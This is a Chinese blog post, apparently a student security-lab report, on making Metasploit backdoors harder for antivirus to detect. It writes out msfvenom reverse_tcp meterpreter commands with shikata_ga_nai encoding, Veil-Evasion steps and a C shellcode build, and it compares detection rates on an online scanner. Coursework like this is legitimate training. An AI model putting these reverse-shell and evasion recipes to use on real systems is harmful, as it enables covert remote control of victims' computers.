标签:语言 shell 格式 获取 情况 info 一个 开启 直接
Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.virscan.org/上进行扫描,有48%的杀软报告病毒。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5338端口号 -f exe >后门名字.exe
结果被查出率降低了,可能是因为进行了编码的缘故,所以网站监测结果降低了 5个百分点。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的IP LPORT=5338端口号 -f exe > 后门名字.exe
多次编码好像和第一次的结果差不多,恢复后依然放入网站检查。
在Kali的终端中启动Veil-Evasion
命令行中输入veil,后在veil中输入命令use evasion
依次输入如下命令生成你的可执行文件:
use c/meterpreter/rev_tcp.py
可执行文件的文件名
首先,在Kali上使用命令生成一个c语言格式的Shellcode数组。
由VS编译运行生成一个.exe文件
之后放入网站进行检测,效果还比较客观,只有百分之20的被查出率
标签:语言 shell 格式 获取 情况 info 一个 开启 直接
原文地址:https://www.cnblogs.com/Hdywan/p/8782490.html